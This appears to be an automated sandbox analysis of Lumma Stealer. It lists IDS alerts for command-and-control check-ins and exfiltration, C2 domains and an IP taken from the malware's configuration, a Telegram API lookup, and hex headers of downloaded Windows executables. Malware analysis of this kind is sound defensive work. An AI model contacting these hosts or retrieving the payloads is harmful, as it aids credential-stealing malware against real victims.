Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50060 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50068 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50068 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50120 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50120 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50141 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50185 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50185 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50186 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50128 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50128 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50180 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50180 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50222 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50189 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50189 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50240 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50240 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50250 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50205 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50205 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50264 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50287 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50276 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50304 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50298 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50247 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50247 -> 104.21.67.146:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50517 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50517 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50520 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50520 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50544 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50614 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50526 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50614 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50633 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50541 -> 172.67.209.202:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50639 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50616 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50616 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50636 -> 104.21.89.115:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50174 -> 104.21.21.99:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: cheapptaxysu.click
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	IPs: 185.215.113.43

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:11 GMTContent-Type: application/octet-streamContent-Length: 2668544Last-Modified: Sat, 21 Dec 2024 08:45:32 GMTConnection: keep-aliveETag: "6766802c-28b800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ca 47 72 61 ab 29 21 61 ab 29 21 61 ab 29 21 13 2a 2a 20 6c ab 29 21 13 2a 2c 20 f5 ab 29 21 13 2a 2d 20 72 ab 29 21 70 2d 2a 20 73 ab 29 21 70 2d 2d 20 71 ab 29 21 70 2d 2c 20 47 ab 29 21 13 2a 28 20 64 ab 29 21 61 ab 28 21 3f ab 29 21 e2 2d 21 20 60 ab 29 21 e2 2d d6 21 60 ab 29 21 e2 2d 2b 20 60 ab 29 21 52 69 63 68 61 ab 29 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f4 a8 65 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 aa 26 00 00 1c 02 00 00 00 00 00 50 a5 23 00 00 10 00 00 00 c0 26 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 29 00 00 04 00 00 be fd 28 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 aa 27 00 3c 00 00 00 00 f0 27 00 7d 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 28 00 b8 6a 00 00 00 9c 27 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 9b 27 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 aa a8 26 00 00 10 00 00 00 aa 26 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2c f1 00 00 00 c0 26 00 00 f2 00 00 00 ae 26 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 1a 00 00 00 c0 27 00 00 0a 00 00 00 a0 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 70 74 61 62 6c 65 80 00 00 00 00 e0 27 00 00 02 00 00 00 aa 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7d 9e 00 00 00 f0 27 00 00 a0 00 00 00 ac 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b8 6a 00 00 00 90 28 00 00 6c 00 00 00 4c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:21 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:28 GMTContent-Type: application/octet-streamContent-Length: 1861632Last-Modified: Thu, 19 Dec 2024 20:35:58 GMTConnection: keep-aliveETag: "676483ae-1c6800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 6b 63 61 7a 62 6f 00 f0 19 00 00 50 2f 00 00 e2 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 74 6c 6c 6f 7a 63 76 00 10 00 00 00 40 49 00 00 06 00 00 00 40 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 49 00 00 22 00 00 00 46 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:37 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Sat, 21 Dec 2024 08:14:10 GMTConnection: keep-aliveETag: "676678d2-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c0 45 00 00 e0 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 18 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:43 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:10 GMTConnection: keep-aliveETag: "675afab6-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:16:50 GMTContent-Type: application/octet-streamContent-Length: 4470272Last-Modified: Sun, 22 Dec 2024 00:33:17 GMTConnection: keep-aliveETag: "67675e4d-443600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c6 e7 66 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d4 4e 00 00 c6 74 00 00 32 00 00 00 70 c6 00 00 10 00 00 00 f0 4e 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c6 00 00 04 00 00 2f 58 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 